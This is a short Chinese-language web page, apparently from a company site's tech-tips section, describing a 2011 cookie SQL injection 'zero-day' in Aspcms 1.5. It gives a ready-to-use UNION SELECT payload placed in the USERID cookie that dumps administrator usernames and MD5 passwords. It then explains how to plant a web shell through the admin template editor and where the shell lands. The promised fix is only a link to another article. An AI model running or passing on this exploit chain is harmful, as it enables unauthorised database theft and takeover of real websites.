知识学堂
  • ·联系电话:+86.023-75585550
  • ·联系传真:+86.023-75585550
  • ·24小时手机:13896886023
  • ·QQ 咨 询:361652718 513960520
当前位置 > 首页 > 知识学堂 > 常见技术问题
Aspcms 1.5 COOKIES注入0day及修复
更新时间:2011-12-09 | 发布人:本站 | 点击率:1151
Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值
 
在后面加上注入语句:
 
UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
 
然后编辑帐号就能看到管理员的帐号和MD5密码值。
 
后台拿SHELL:
 
访问admin/_Style/AspCms_TemplateEdit.asp?filename=tmdsb.asp在里面加一句话或者大马。
 
保存后SHELL在风格目录下面。Templates/default/html/tmdsb.asp
 
 
 
修复:参考本站cookies注入文章
分享到: QQ空间 新浪微博 开心网 人人网
相关文章